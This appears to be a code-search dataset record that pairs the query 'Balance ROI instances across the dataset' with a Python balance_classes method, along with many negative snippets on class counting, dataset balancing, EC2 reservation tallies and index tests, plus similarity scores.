probs.append(0)\n return probs", "def class_callcount(self):\n # timing is stored by node, we compute timing by class on demand\n rval = {}\n for (fgraph, node), count in self.apply_callcount.items():\n typ = type(node.op)\n rval.setdefault(typ, 0)\n rval[typ] += count\n return rval", "def num_classes_a(self):\r\n return self._num_classes_a", "def class_num(self) -> int:\n return int(np.argmax(self.class_scores))", "def count_ner_labels(self, y_true, y_pred):\n return Counter(y_true), Counter(y_pred)", "def _number_of_samples(self):\n return len(self._raw_data.samples)", "def compute_class_freqs(gen):\r\n labels = gen.labels\r\n N = labels.shape[0]\r\n positive_frequencies = np.sum(labels, axis=0) / N\r\n negative_frequencies = np.sum(1 - labels, axis=0) / N\r\n return positive_frequencies, negative_frequencies", "def get_num_classes(self):\n return len(self.class_map_dict)", "def _class_count_2(X, n_classes, worker_weight=None):\n prob = np.zeros((X.shape[1], 
n_classes))\n if worker_weight is None:\n for i in range(X.shape[0]):\n for j in range(X.shape[1]):\n prob[j, X[i, j]] += 1\n else:\n for i in range(X.shape[0]):\n for j in range(X.shape[1]):\n prob[j, X[i, j]] += worker_weight[i]\n return prob", "def view_counts():\n out = {}\n for i in range(len(classes)):\n out.update({decoded[i]: storage.count(classes[i])})\n return out", "def computeNucStats(trues, preds):\n\t#TP, TN, FP, FN\n\tcount = zeros(4)\n\tfor a in range(len(trues)):\n\t\tif (trues[a] == 'F') & (preds[a] == 'F'):\n\t\t\tcount[0] += 1\n\t\telif (trues[a] == 'N') & (preds[a] == 'N'):\n\t\t\tcount[1] += 1\n\t\telif (trues[a] == 'N') & (preds[a] == 'F'):\n\t\t\tcount[2] += 1\n\t\telif (trues[a] == 'F') & (preds[a] == 'N'):\n\t\t\tcount[3] += 1\n\treturn count", "def number_of_constituents(bc_class):\n num_trn = 0\n cn = bc_class.constituent_properties\n if cn.salinity:\n num_trn += 1\n if cn.temperature:\n num_trn += 1\n if cn.vorticity:\n num_trn += 1\n if not cn.general_constituents.empty:\n num_trn += len(cn.general_constituents.index)\n if not cn.sand.empty:\n num_trn += len(cn.sand.index)\n if not cn.clay.empty:\n num_trn += len(cn.clay.index)\n return num_trn", "def getClassCounts(column, uniqueVal, decision, yes, no , total):\r\n dataDict = {} # a dictionary of labels\r\n for val in uniqueVal:\r\n label1 = val + '/Y'\r\n label2 = val + '/N'\r\n dataDict[label1] = 0; dataDict[label2] = 0\r\n for dec, at in zip(decision, column):\r\n if at == val and dec == 'No':\r\n dataDict[label2] += 1\r\n if at == val and dec == 'Yes':\r\n dataDict[label1] += 1\r\n dataDict[val] = (dataDict[label2]+ dataDict[label1])/ total\r\n dataDict[label2] = dataDict[label2] / no\r\n dataDict[label1] = dataDict[label1] / yes\r\n return dataDict", "def count(self):\n\n raise NotImplementedError", "def num_training_examples(self):", "def get_class_stats(self, curr_class, class_superpixels, kernel_size=3):\n\n # Create a label for each component in the image\n num_obj, output, bbox, centroids = \\\n cv2.connectedComponentsWithStats(class_superpixels.astype(np.uint8), connectivity=8) #added dtype uint8\n\n # Only keep blobs that are above a certain area threshold. Zero out all\n # blobs that are below this threshold. 
bbox[i,-1] returns the area of the bounding box\n good_idx = [i for i in xrange(num_obj) if 50000 > bbox[i, -1] > self.area_thresh[curr_class]] # here changes max from 10000\n\n # if no blobs / objects were found\n if len(good_idx) == 0:\n return None, None\n good_idx = np.hstack(good_idx)\n\n # Zero out all detections on the image\n for i in set(np.arange(num_obj)).symmetric_difference(good_idx):\n output[output == i] = 0\n\n stats = {}\n stats['count'] = len(good_idx)\n stats['bbox'] = bbox[good_idx] #(tl_x, tl_y, width, height, area)\n stats['centroid'] = centroids[good_idx].astype(np.int32)\n\n # keep track of how to map labels to stats indices\n idx_map={}\n count=0\n for i in range(0,len(good_idx)):\n idx_map[good_idx[i]]=i+1\n\n for i in range(0,len(good_idx)):\n output[output==good_idx[i]]=idx_map[good_idx[i]]\n\n return stats, output", "def purity_score(clusters, classes):\n clusters = np.array(clusters)\n classes = np.array(classes)\n A = np.c_[(clusters,classes)]\n\n n_accurate = 0.\n\n for j in np.unique(A[:,0]):\n z = A[A[:,0] == j, 1]\n x = np.argmax(np.bincount(z))\n n_accurate += len(z[z == x])\n\n return n_accurate / A.shape[0]", "def getMetricsClass(pred_bboxes, gt_bboxes, nclasses):\r\n aps = []\r\n iou = []\r\n for cls in range(nclasses):\r\n if bool(pred_bboxes):\r\n if len(pred_bboxes[0]) == 4: \r\n avg_precision_class, iou_class = getMetrics(pred_bboxes, gt_bboxes)\r\n if len(pred_bboxes[0]) == 5:\r\n avg_precision_class, iou_class = getMetrics(pred_bboxes, gt_bboxes, confidence = True)\r\n else:\r\n avg_precision_class = 0\r\n iou_class = 0\r\n\r\n aps.append(avg_precision_class)\r\n iou.append(iou_class)\r\n \r\n return np.mean(aps), np.mean(iou)", "def count():", "def get_counts(self):\n counts = [0, 0]\n for i in range(self._num_rows):\n for j in range(self._num_cols):\n if self._board[i][j] == \"B\":\n counts[0] += 1\n elif self._board[i][j] == \"W\":\n counts[1] += 1\n return counts", "def get_num_classes(hparams):\n num_classes_map = {\n 'imagenet': 1000,\n 'cifar10': 10,\n }\n if hparams.input_data.input_fn not in num_classes_map:\n raise ValueError(\n f'Unknown number of classes for input_fn {hparams.input_data.input_fn}')\n return num_classes_map[hparams.input_data.input_fn]", "def score_all(results):\n Y = np.concatenate([results['%dtest'%n] for n in range(10)])\n print score(np.concatenate([results['%dtrain'%n] for n in range(10)]))\n print score(np.concatenate([results['%dtest'%n] for n in range(10)]))\n class_counts = np.asarray([(Y[:,0]==n).sum() for n in range(10)])\n return confusion_matrix(Y[:,0],Y[:,1]), class_counts", "def calc_priors(categories, data):\n counts = np.zeros(categories)\n for val in range(categories):\n counts[val] = np.count_nonzero(data.labels == val)\n return counts / len(data.labels)", "def stats():\n class_counts = {}\n convert_dict = {\n 'Amenity': 'amenities',\n 'State': 'states',\n 'City': 'cities',\n 'User': 'users',\n 'Place': 'places',\n 'Review': 'reviews'\n }\n\n for _class in convert_dict.keys():\n class_counts[convert_dict[_class]] = storage.count(_class)\n\n return jsonify(class_counts)", "def raw_counts(self):\n return np.array([1, 2, 3])", "def raw_counts(self):\n return np.array([1, 2, 3])", "def number_of_running_metrics(self):\n try:\n return len(self.get_classads(\"OSGRSV==\\\"metrics\\\"\"))\n except TypeError:\n self.rsv.log(\"ERROR\", \"Classad parsing failed, unable to count running metrics\")", "def classify(cls, i):\r\n sums = [0,0]\r\n sums[int(WekaClassifier_0.classify(i))] += 1.2134644010075073\r\n 
sums[int(WekaClassifier_1.classify(i))] += 0.57177685574344\r\n sums[int(WekaClassifier_2.classify(i))] += 0.40154496884580815\r\n sums[int(WekaClassifier_3.classify(i))] += 0.35999934750119333\r\n sums[int(WekaClassifier_4.classify(i))] += 0.36937329276984643\r\n sums[int(WekaClassifier_5.classify(i))] += 0.16351990613377496\r\n sums[int(WekaClassifier_6.classify(i))] += 0.1396078832952814\r\n sums[int(WekaClassifier_7.classify(i))] += 0.15882943193304253\r\n sums[int(WekaClassifier_8.classify(i))] += 0.1284505298097081\r\n sums[int(WekaClassifier_9.classify(i))] += 0.09903161346969916\r\n sums[int(WekaClassifier_10.classify(i))] += 0.19672733155497407\r\n sums[int(WekaClassifier_11.classify(i))] += 0.17672847093616786\r\n sums[int(WekaClassifier_12.classify(i))] += 0.18729151620386228\r\n sums[int(WekaClassifier_13.classify(i))] += 0.24810462685136855\r\n sums[int(WekaClassifier_14.classify(i))] += 0.23706555932983922\r\n sums[int(WekaClassifier_15.classify(i))] += 0.14276017880034322\r\n sums[int(WekaClassifier_16.classify(i))] += 0.2655207144416779\r\n sums[int(WekaClassifier_17.classify(i))] += 0.24759035974335297\r\n sums[int(WekaClassifier_18.classify(i))] += 0.14255881855351965\r\n sums[int(WekaClassifier_19.classify(i))] += 0.1181101393342422 \r\n return float(sums[0] - sums[1])", "def get_count(cls):\n total = 0\n for counter in SimpleCounterShard.objects.all():\n total += counter.count\n return total", "def count_labels(labels, num_classes):\n return np.array([\n np.bincount(segment_labels, minlength=num_classes) for _, segment_labels in labels\n ])", "def num_regions(image_data):\n if len(image_data.shape) > 2:\n image_data = skimage.color.rgb2gray(image_data)\n _, num_labels = ndimage.label(image_data)\n return num_labels", "def __len__(self):\n if self.TRAIN_BOOL is True:\n count = len(self.dict_batch_1[b'data'])\n count += len(self.dict_batch_2[b'data'])\n count += len(self.dict_batch_3[b'data'])\n count += len(self.dict_batch_4[b'data'])\n count += len(self.dict_batch_5[b'data'])\n else:\n count = len(self.dict_batch_test[b'data'])\n return count", "def accuracy(self):\n # Initialize key variables\n correct = {}\n prediction = 0\n cls_count = {}\n accuracy = {}\n\n # Analyze all the data\n for cls in self.pca_object.classes():\n # Get list of x values to test\n vectors = self.pca_object.xvalues(cls)\n\n # Process each vector\n for vector in vectors:\n # Get the prediction\n prediction = self.classifier(vector)\n\n # Only count definitive predictions\n if prediction is not None:\n # Count the number of correct predictions\n if prediction == cls:\n if cls in correct:\n correct[cls] += 1\n else:\n correct[cls] = 1\n\n # Increment the count\n if cls in cls_count:\n cls_count[cls] += 1\n else:\n cls_count[cls] = 1\n\n # Calculate per class accuracy\n correct[None] = 0\n cls_count[None] = 0\n for cls in cls_count.keys():\n if cls_count[cls] != 0:\n accuracy[cls] = correct[cls] / cls_count[cls]\n\n # Keep a tally for all successes\n correct[None] = correct[None] + correct[cls]\n cls_count[None] = cls_count[None] + cls_count[cls]\n\n # Calulate overall accuracy\n accuracy[None] = correct[None] / cls_count[None]\n\n # Return\n return accuracy", "def getCounts(self):\n ret = [0]*len(self.numToLabel)\n for block in self.blocks:\n for label in block[1]: ret[label] += 1\n return ret", "def test(self, samples):\n prediction_errors = np.zeros(len(samples), int)\n predictions = np.zeros(len(samples), int)\n class_predictions = np.zeros(self.class_count)\n \n for i in range(len(samples)): # 
Loop over each sample\n for j in range(self.class_count): # Loop over each class\n class_predictions[j] = self.p_ys[j] # Get p(y) for class j\n \n # Multiply p(y) by p(xi|y) \n class_predictions[j] += np.dot(samples[i,:-1], self.p_xi_given_ys[j]) \n \n predictions[i] = np.argmax(class_predictions) # Prediction is class with highest probability.\n \n # Check if the predicted class doesn't match the true class.\n if(predictions[i] != samples[i][-1]):\n prediction_errors[i] = 1 \n \n # Compute accuracy\n accuracy = 1.0 - (np.sum(prediction_errors) * 1.0 / len(prediction_errors)) \n \n return prediction_errors, predictions, accuracy", "def count(self):\n \n return len(self.img_lst)", "def _number_states_in_pclass(n_modes, pclass):\n out = fact(n_modes) / fact(n_modes - len(pclass))\n out /= _compute_mu_factor2(_lengths_groupings(pclass))\n return out.astype(int)", "def class_nodes(self):\r\n # timing is stored by node, we compute timing by class on demand\r\n rval = {}\r\n for node, count in self.apply_callcount.items():\r\n typ = type(node.op)\r\n rval.setdefault(typ, 0)\r\n rval[typ] += 1\r\n return rval", "def test_counts(self):\n c = array([5,0,1,1,5,5])\n obs = counts(c)\n exp = array([1,2,0,0,0,3])\n self.assertEqual(obs, exp)\n d = array([2,2,1,0])\n obs = counts(d, obs)\n exp = array([2,3,2,0,0,3])\n self.assertEqual(obs, exp)", "def raw_counts(self):\n return np.array([[1, 2], [3, 4], [5, 6]])", "def __sample_count(samples: Samples, sample_result: Literal[\"true\", \"false\"]) -> int:\n return len([sample for sample in samples if sample[\"success\"] == sample_result])" ]
[ "0.6769185", "0.6670084", "0.6666405", "0.6666405", "0.6666405", "0.6578789", "0.6500897", "0.64842236", "0.6412822", "0.63247687", "0.6280898", "0.6262814", "0.62501544", "0.6188363", "0.6161805", "0.6135146", "0.6125166", "0.6116448", "0.60772496", "0.6040804", "0.60212356", "0.6016649", "0.60124046", "0.600877", "0.600877", "0.6008631", "0.59963614", "0.59748554", "0.59655774", "0.5942847", "0.59368145", "0.59252775", "0.5912391", "0.5912391", "0.5900119", "0.58792335", "0.58783996", "0.587202", "0.5871406", "0.5866115", "0.5857809", "0.58316314", "0.5824779", "0.5818189", "0.5805377", "0.57989544", "0.57947576", "0.57793695", "0.577439", "0.5774136", "0.57584333", "0.5754318", "0.5744336", "0.57434714", "0.5736308", "0.57333374", "0.5727899", "0.57243896", "0.5712407", "0.56994927", "0.5697707", "0.56895053", "0.568553", "0.56713635", "0.56626344", "0.56548154", "0.56536585", "0.5649191", "0.5646447", "0.5634072", "0.5632619", "0.56314677", "0.56287336", "0.5619157", "0.5611349", "0.5600389", "0.5585762", "0.55816126", "0.55814177", "0.55806494", "0.55698895", "0.5569031", "0.5566995", "0.55632114", "0.55632114", "0.5558024", "0.5523926", "0.5518037", "0.55153275", "0.5514431", "0.5511272", "0.5509461", "0.5505697", "0.54977953", "0.54973257", "0.5494107", "0.5487905", "0.54840815", "0.5482737", "0.54765296" ]
0.73258656
0
Balance ROI instances across the dataset
def balance_classes(self, classids):
    # Get ROI class counts for each sample patch:
    samples = self.SampleID
    counts = self.count_classes(samples)
    counts = counts[:, classids]
    totalcount = np.sum(counts, axis=0)

    # Find the class with minimum and maximum total count:
    c_min = np.argmin(totalcount)
    c_max = np.argmax(totalcount)

    # Class balancing is performed as long as the min-max class ratio is
    # not within 50%.
    #
    # Balancing Algorithm:
    # * Randomly sample from samples with non-zero min-class ROI counts
    #   and zero maximum class ROIs.
    # * Simultaneously, randomly sample a subset of max-class only samples
    #   to be removed from the dataset. This levels the field from both
    #   directions.
    class_ratio = totalcount[c_min] / totalcount[c_max]

    while (class_ratio < 0.5) & (len(samples) < 3*5000):
        # Find samples with maximum min-max class ratio:
        N = np.sum((counts[:, c_min] > 0) & (counts[:, c_max] == 0))
        M = int(0.5*N)

        # Min-class samples to add:
        min_sample = np.nonzero((counts[:, c_min] > 0) & (counts[:, c_max] == 0))
        min_sample = min_sample[0]  # Unfold tuple
        min_sample = min_sample[np.random.randint(0, len(min_sample)-1, N)]

        # Max-class samples to remove:
        max_sample = np.nonzero((counts[:, c_min] == 0) & (counts[:, c_max] > 0))
        max_sample = max_sample[0]  # Unfold tuple
        max_sample = max_sample[np.random.randint(0, len(max_sample)-1, M)]
        max_sample = np.unique(max_sample)

        # Construct new sample set:
        min_sample = samples[min_sample]
        samples = np.append(np.delete(samples, max_sample), min_sample)

        # Recompute total count and min-max class ratio:
        counts = self.count_classes(samples)[:, classids]
        totalcount = np.sum(counts, axis=0)
        c_min = np.argmin(totalcount)
        c_max = np.argmax(totalcount)
        class_ratio = totalcount[c_min] / totalcount[c_max]

    # Done, balanced, update samples:
    balancedset = self.Samples[samples, :]
    self._set_sampling_scheme_(balancedset)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def balanceData(dataPath,dataPathFile):\r\n \r\n databaseDict = loadData(os.path.join(dataPath,dataPathFile))\r\n classes = 7\r\n balancedDict = {}\r\n \r\n print('Start Balancing data')\r\n for fold in databaseDict.keys():\r\n fold_dic_not_balanced = databaseDict[fold]\r\n targetsVec = fold_dic_not_balanced['Targets']\r\n classesList = [[] for i in range(classes)]\r\n \r\n foldKeys = fold_dic_not_balanced.keys()\r\n print(foldKeys)\r\n \r\n if list(foldKeys)[0] == 'images':\r\n data = fold_dic_not_balanced['images']\r\n else:\r\n data = fold_dic_not_balanced['data']\r\n data2 = fold_dic_not_balanced['data2']\r\n \r\n \r\n cont = 0\r\n indx = 0\r\n for tgt in targetsVec:\r\n classesList[int(tgt)].append(indx)\r\n indx += 1\r\n \r\n instances = []\r\n for classinst in classesList:\r\n instances.append(len(classinst))\r\n \r\n instances = np.array(instances)\r\n org_instances = np.sort(instances)\r\n \r\n print(org_instances)\r\n \r\n min_inst = org_instances[1]\r\n print(min_inst)\r\n time.sleep(5)\r\n \r\n chann = 0\r\n for classinst in classesList:\r\n shuffledInst = np.array(classinst)\r\n np.random.shuffle(shuffledInst)\r\n cont2 = 0\r\n for j in shuffledInst[:min_inst]:\r\n aux_data = np.expand_dims(data[:,j,:],axis=1)\r\n aux_targ = targetsVec[j]\r\n if cont > 0:\r\n balancedData = np.append(balancedData,aux_data,axis=1)\r\n balancedTargets = np.append(balancedTargets,aux_targ)\r\n if list(foldKeys)[0] != 'images':\r\n balancedData_2 = np.append(balancedData_2,\r\n np.expand_dims(data2[:,j,:],\r\n axis=1))\r\n else:\r\n balancedData = aux_data\r\n balancedTargets = aux_targ\r\n if list(foldKeys)[0] != 'images':\r\n balancedData_2 = np.expand_dims(data2[:,j,:],axis=1)\r\n cont += 1\r\n cont2 += 1\r\n print('Fold: ',fold, 'Channel: ',chann, 'Image num: ',cont2)\r\n chann += 1\r\n\r\n foldDict = {}\r\n foldDict['Targets'] = balancedTargets\r\n foldDict['instances'] = org_instances\r\n if list(foldKeys)[0] == 'images':\r\n foldDict['images'] = balancedData\r\n else:\r\n foldDict['data'] = balancedData\r\n foldDict['data2'] = balancedData_2\r\n \r\n balancedDict[fold] = foldDict\r\n \r\n\r\n savePath = os.path.join(dataPath,'balancedData',dataPathFile)\r\n pickle.dump(balancedDict, open(savePath, 'wb'), pickle.HIGHEST_PROTOCOL)\r\n print('Saved Balanced dataBase') \r\n \r\n return balancedDict", "def balance_dataset(dataset):\n \n print(\"Balancing dataset...\")\n n = len(dataset)\n labels = ch.Tensor([dataset[i][1] for i in range(n)]).int()\n n0 = sum(labels).item()\n I_pos = labels == 1\n\n idx = ch.arange(n)\n idx_pos = idx[I_pos]\n ch.manual_seed(0)\n I = ch.randperm(n - n0)[:n0]\n idx_neg = idx[~I_pos][I]\n idx_bal = ch.cat([idx_pos, idx_neg],dim=0)\n return Subset(dataset, idx_bal)", "def test_pandas_occupancy_balance(self):\n data = load_occupancy(return_dataset=True)\n X, y = data.to_pandas()\n\n # Create and fit the visualizer\n oz = ClassBalance()\n assert oz.fit(y) is oz\n\n # oz.finalize()\n self.assert_images_similar(oz)", "def ComputeRegenerativeBraking(self):\r\n pass", "def __balance_data(self):\n # Shuffle each class independently (This is useful in case of multiple root directories because it does not\n # discard only elements of the last listed root directory, but random elements of all root directories)\n start_index = 0\n for class_id, num_samples_in_this_class in enumerate(self.__samples_per_class):\n permutation = np.random.permutation(num_samples_in_this_class)\n self.__image_file_names[start_index:start_index + num_samples_in_this_class] = \\\n 
self.__image_file_names[start_index:start_index + num_samples_in_this_class][permutation]\n start_index += num_samples_in_this_class\n\n class_with_min_samples = np.argmin(self.__samples_per_class)\n num_min_samples = self.__samples_per_class[class_with_min_samples]\n\n # Remove all elements in the majority classes in order to balance their sample numbers to the minority class.\n start_index = 0\n elements_to_delete = []\n for num_samples_in_this_class in self.__samples_per_class:\n new_indices_to_delete = [i for i in\n range(start_index + num_min_samples, start_index + num_samples_in_this_class)]\n elements_to_delete.extend(new_indices_to_delete)\n start_index += num_samples_in_this_class\n\n self.__labels = np.delete(self.__labels, elements_to_delete)\n self.__image_file_names = np.delete(self.__image_file_names, elements_to_delete)\n\n # Check for class balance.\n cumulator = np.zeros(shape=3)\n for label in self.__labels:\n cumulator[label] += 1\n for i in range(2):\n if cumulator[i] != cumulator[i + 1]:\n raise RuntimeError(\"Error in data balancing: resulting label distribution: {}\".format(cumulator))\n\n self.__samples_per_class = [num_min_samples for _ in range(self.num_classes)]", "def balance_set(X, Y, adr_labels_size, nonadr_labels_size):\n\n print(\"Performing Class Balancing...\")\n adr_samples_needed = nonadr_labels_size - adr_labels_size\n new_X = []\n new_Y = []\n adr_labels_size = 0\n nonadr_labels_size = 0\n\n for index, example in enumerate(X):\n if adr_samples_needed > 0:\n if Y[index] == ADR_MENTION_CLASS_LABEL:\n new_X.append(example) # add original 'ADR' sample\n new_Y.append(ADR_MENTION_CLASS_LABEL)\n new_X.append(example) # add duplicate 'ADR' sample to perform Over-Sampling\n new_Y.append(ADR_MENTION_CLASS_LABEL)\n\n adr_labels_size += 2\n adr_samples_needed -= 1\n else:\n # we don't add original 'No ADR Mention' sample to perform Under-Sampling\n adr_samples_needed -= 1\n\n else:\n if Y[index] == ADR_MENTION_CLASS_LABEL:\n adr_labels_size += 1\n else:\n nonadr_labels_size += 1\n\n new_X.append(example) # add original sample\n new_Y.append(Y[index]) # add original label\n\n print(\" Updated dataset size: {}\".format(len(new_X)))\n print(\" {} class size: {}\".format(ADR_MENTION_CLASS_NAME, adr_labels_size))\n print(\" {} class size: {}\".format(NON_ADR_MENTION_CLASS_NAME, nonadr_labels_size))\n\n return new_X, new_Y", "def handle_imbalance(dataset, minority_class):\n for i, l in enumerate(dataset):\n if l == minority_class:\n dataset[i] = 2\n return dataset", "def test_quick_method_with_splits(self):\n dataset = make_fixture(binary=False, split=True)\n\n viz = class_balance(dataset.y.train, dataset.y.test, show=False)\n\n assert isinstance(viz, ClassBalance)\n self.assert_images_similar(viz)", "def test_multiclass_balance(self):\n dataset = make_fixture(binary=False, split=False)\n\n oz = ClassBalance()\n assert oz.fit(dataset.y) is oz\n assert oz._mode == BALANCE\n\n # oz.finalize()\n self.assert_images_similar(oz)", "def test_numpy_occupancy_balance(self):\n data = load_occupancy(return_dataset=True)\n X, y = data.to_numpy()\n\n # Create and fit the visualizer\n oz = ClassBalance()\n assert oz.fit(y) is oz\n\n # oz.finalize()\n self.assert_images_similar(oz)", "def test_quick_method(self):\n data = load_occupancy(return_dataset=True)\n _, y = data.to_numpy()\n\n visualizer = balanced_binning_reference(y, show=False)\n\n assert isinstance(visualizer, BalancedBinningReference)\n self.assert_images_similar(visualizer, tol=0.5)", "def test_binary_balance(self):\n 
dataset = make_fixture(binary=True, split=False)\n\n oz = ClassBalance()\n assert oz.fit(dataset.y) is oz\n assert oz._mode == BALANCE\n\n # oz.finalize()\n self.assert_images_similar(oz)", "def returnBalances(self):\n pass", "def my_rebalance(context,data):\n log.info(\"rebalancing...\")\n context.output = pipeline_output('my_pipeline')\n log.info(\"retrieved pipeline output...\")\n \n # These are the securities that we are interested in trading each day.\n context.security_list = context.output.index\n \n if context.prime == False:\n order_target_percent(symbol('SPY'),1) #hold SPY as a default \n context.prime = True\n \n weight= 1.0/len(context.security_list)\n \n for stock in context.security_list:\n log.info(\"Buying %s\" % (stock.symbol))\n order_target_percent(stock, weight)\n \n #: Exit any positions we might have\n for stock in context.portfolio.positions:\n if data.can_trade(stock) and stock not in context.security_list:\n log.info(\"Exiting our positions on %s\" % (stock.symbol))\n order_target_percent(stock, 0)", "def test_quick_method(self):\n dataset = make_fixture(binary=False, split=False)\n\n viz = class_balance(dataset.y, show=False)\n\n assert isinstance(viz, ClassBalance)\n self.assert_images_similar(viz, tol=0.5)", "def balance_dataset_sampling(instances):\n probabilities = get_balancing_probabilities(instances)\n new_instances = [ (features, classification) \n for features, classification in instances \n if random.random() < probabilities[classification] ]\n\n return new_instances", "def calculate_ec2_ris(session, results):\n ec2_conn = session.client('ec2')\n\n\n paginator = ec2_conn.get_paginator('describe_instances')\n page_iterator = paginator.paginate(\n Filters=[{'Name': 'instance-state-name', 'Values': ['running']}])\n\n # Loop through running EC2 instances and record their AZ, type, and\n # Instance ID or Name Tag if it exists.\n for page in page_iterator:\n for reservation in page['Reservations']:\n for instance in reservation['Instances']:\n # Ignore spot instances\n if 'SpotInstanceRequestId' not in instance:\n #az = instance['Placement']['AvailabilityZone']\n instance_type = instance['InstanceType']\n # Check for 'skip reservation' tag and name tag\n found_skip_tag = False\n instance_name = None\n cloud_bill_review_comment = None\n if 'Tags' in instance:\n for tag in instance['Tags']:\n if tag['Key'] == 'Name' and len(tag['Value']) > 0:\n instance_name = tag['Value'] \n if tag['Key'] == 'CloudBillReviewComment' and len(tag['Value']) > 0:\n cloud_bill_review_comment = tag['Value'] \n \n instancekey = instance['InstanceId'] if not instance_name else instance_name \n #print(instancekey)\n\n #if instance_type == 't2.small':\n # print('instance type: %s instance_id: %s' %(instance_type, instancekey))\n\n if cloud_bill_review_comment:\n tags[instancekey] = cloud_bill_review_comment\n #print(tags[instancekey])\n cloud_bill_review_comment = None\n\n results['ec2_running_instances'][(instance_type)] = \\\n results['ec2_running_instances'].get((instance_type), 0) + 1\n \n instance_ids[(instance_type)].append(\n instance['InstanceId'] if not instance_name\n else instance_name)\n\n #print(instance_ids[('t2.small')])\n\n\n # Loop through active EC2 RIs and record their AZ and type.\n for reserved_instance in ec2_conn.describe_reserved_instances(\n Filters=[{'Name': 'state', 'Values': ['active']}])['ReservedInstances']:\n # Detect if an EC2 RI is a regional benefit RI or not\n\n instance_type = reserved_instance['InstanceType']\n\n results['ec2_reserved_instances'][(\n 
instance_type)] = results['ec2_reserved_instances'].get(\n (instance_type), 0) + reserved_instance['InstanceCount']\n\n reserve_expiry[(instance_type)].append(calc_expiry_time(\n expiry=reserved_instance['End']))\n \n\n return results", "def _balance(self):\n\n # first try to load disk object to memory\n while (\n self._in_memory_objects.memory_usage < self._memory_threshold\n and len(self._disk_objects) > 0\n ):\n node = self._disk_objects.pop_last()\n bucket_object = node.value\n # remove object from inverted dict\n self._object_to_list_node.pop(bucket_object)\n # load object from memory\n bucket_object.value = bucket_object.load_value()\n self._object_to_list_node[bucket_object] = node\n self._in_memory_objects.add_first(node)\n # then persist extra objects to disk based on LRU rule\n while self._in_memory_objects.memory_usage > self._memory_threshold:\n node = self._in_memory_objects.pop_first()\n bucket_object = node.value\n # remove object from inverted dict\n self._object_to_list_node.pop(bucket_object)\n # persist object to disk, update bucket_object's value\n disk_value = bucket_object.bucket.persist_value(bucket_object.value)\n bucket_object.value = disk_value\n self._object_to_list_node[bucket_object] = node\n self._disk_objects.append(node)", "def test_no_impact_between_tenants(self):\n field = 'body'\n indexMap, createIndexTasklist = self.indexUtil.create_gsi_on_each_collection(self.cluster,\n replica=self.index_replicas,\n defer=False,\n number_of_indexes_per_coll=self.index_count,\n field=field, sync=False)\n for taskInstance in createIndexTasklist:\n self.task.jython_task_manager.get_task_result(taskInstance)\n self.log.debug(\"Getting initial RR values\")\n stat_obj_list = self.create_Stats_Obj_list()\n stat_field = 'resident_ratio'\n initial_rr_value_map = self.get_plasma_index_stat_value(stat_field, stat_obj_list)\n\n bucket_list = []\n bucket_list.append(self.cluster.buckets[0])\n\n query_tasks_info = self.indexUtil.run_full_scan(self.cluster, indexMap, key='body', totalCount=self.init_items_per_collection,\n limit=self.query_limit)\n for taskInstance in query_tasks_info:\n self.task.jython_task_manager.get_task_result(taskInstance)\n\n newIndexMap, newcreateIndexTasklist = self.indexUtil.create_gsi_on_each_collection(self.cluster,buckets=bucket_list,\n replica=self.index_replicas,\n defer=False,\n number_of_indexes_per_coll=2 * self.index_count,\n count=self.index_count,\n field=field, sync=False)\n for taskInstance in newcreateIndexTasklist:\n self.task.jython_task_manager.get_task_result(taskInstance)\n\n final_rr_value_map = self.get_plasma_index_stat_value(stat_field, stat_obj_list)\n self.compareRR(initial_rr_value_map, final_rr_value_map)", "def test_no_impact_between_tenants(self):\n field = 'body'\n indexMap, createIndexTasklist = self.indexUtil.create_gsi_on_each_collection(self.cluster,\n replica=self.index_replicas,\n defer=False,\n number_of_indexes_per_coll=self.index_count,\n field=field, sync=False)\n for taskInstance in createIndexTasklist:\n self.task.jython_task_manager.get_task_result(taskInstance)\n self.log.debug(\"Getting initial RR values\")\n stat_obj_list = self.create_Stats_Obj_list()\n stat_field = 'resident_ratio'\n initial_rr_value_map = self.get_plasma_index_stat_value(stat_field, stat_obj_list)\n\n bucket_list = []\n bucket_list.append(self.cluster.buckets[0])\n\n query_tasks_info = self.indexUtil.run_full_scan(self.cluster, indexMap, key='body', totalCount=self.init_items_per_collection,\n limit=self.query_limit)\n for taskInstance in 
query_tasks_info:\n self.task.jython_task_manager.get_task_result(taskInstance)\n\n newIndexMap, newcreateIndexTasklist = self.indexUtil.create_gsi_on_each_collection(self.cluster,buckets=bucket_list,\n replica=self.index_replicas,\n defer=False,\n number_of_indexes_per_coll=2 * self.index_count,\n count=self.index_count,\n field=field, sync=False)\n for taskInstance in newcreateIndexTasklist:\n self.task.jython_task_manager.get_task_result(taskInstance)\n\n final_rr_value_map = self.get_plasma_index_stat_value(stat_field, stat_obj_list)\n self.compareRR(initial_rr_value_map, final_rr_value_map)", "def attribute_irrigation():\n fc = ee.FeatureCollection(IRRIGATION_TABLE)\n for state in TARGET_STATES:\n for yr in range(2011, 2021):\n images = os.path.join(ASSET_ROOT, '{}_{}'.format(state, yr))\n coll = ee.Image(images)\n tot = coll.select('classification').remap([0, 1, 2, 3], [1, 0, 0, 0])\n means = tot.reduceRegions(collection=fc,\n reducer=ee.Reducer.mean(),\n scale=30)\n\n task = ee.batch.Export.table.toCloudStorage(\n means,\n description='{}_{}'.format(state, yr),\n bucket='wudr',\n fileNamePrefix='attr_{}_{}'.format(state, yr),\n fileFormat='CSV')\n\n print(state, yr)\n task.start()", "def assign_ids(self, instances):\n if len(instances) == 0:\n return #no new detections to check\n\n # Compute iou with either boxes or masks:\n is_crowd = np.zeros((len(instances),), dtype=np.bool)\n if instances[0].bbox is None:\n assert instances[0].mask_rle is not None\n # use mask iou only when box iou is None\n # because box seems good enough\n rles_old = [x.mask_rle for x in self._old_instances]\n rles_new = [x.mask_rle for x in instances]\n ious = mask_util.iou(rles_old, rles_new, is_crowd)\n threshold = 0.5\n else:\n boxes_old = [x.bbox for x in self._old_instances]\n boxes_new = [x.bbox for x in instances]\n ious = mask_util.iou(boxes_old, boxes_new, is_crowd)\n threshold = 0.6\n if len(ious) == 0:\n ious = np.zeros((len(self._old_instances), len(instances)), dtype=\"float32\")\n\n # Only allow matching instances of the same label:\n for old_idx, old in enumerate(self._old_instances):\n for new_idx, new in enumerate(instances):\n if old.label != new.label:\n ious[old_idx, new_idx] = 0\n\n matched_new_per_old = np.asarray(ious).argmax(axis=1)\n max_iou_per_old = np.asarray(ious).max(axis=1)\n\n # Try to find match for each old instance:\n extra_instances = []\n for idx, inst in enumerate(self._old_instances):\n if max_iou_per_old[idx] > threshold:\n newidx = 